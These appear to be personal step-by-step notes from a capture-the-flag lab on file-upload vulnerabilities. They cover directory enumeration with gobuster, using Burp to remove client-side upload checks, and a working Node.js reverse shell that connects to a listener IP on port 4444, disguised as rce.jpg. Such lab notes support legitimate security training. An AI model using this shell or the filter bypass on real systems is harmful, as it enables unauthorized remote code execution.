- echo "10.10.XXX.XXX overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm" | sudo tee -a /etc/hosts
- gobuster dir -u http://jewel.uploadvulns.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- Delete ^js$ in Burp options
- Burp intercept, ctrl+F5 catch upload.js get rid of file checks
- (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(4444, "10.10.xxx.xxx", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application form crashing })();
- var net = require("net"), sh = require("child_process").exec("/bin/bash");
- var client = new net.Socket();
- client.connect(4444, "10.9.158.221", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
- sh.stderr.pipe(client);});
- save it as rce.jpg
- nc -nlvp 4444
- upload the payload on http://jewel.uploadvulns.thm
- download UploadVulnsWordlist.txt from task
- gobuster dir -u http://jewel.uploadvulns.thm/content -w UploadVulnsWordlist.txt -x jpg
- uploaded payload name (XXX.jpg) is the 5th that's not ABH/LKG/SAD & YWJ
- ../content/XXX.jpg on http://jewel.uploadvulns.thm/admin
- nothing happened in 443 monitor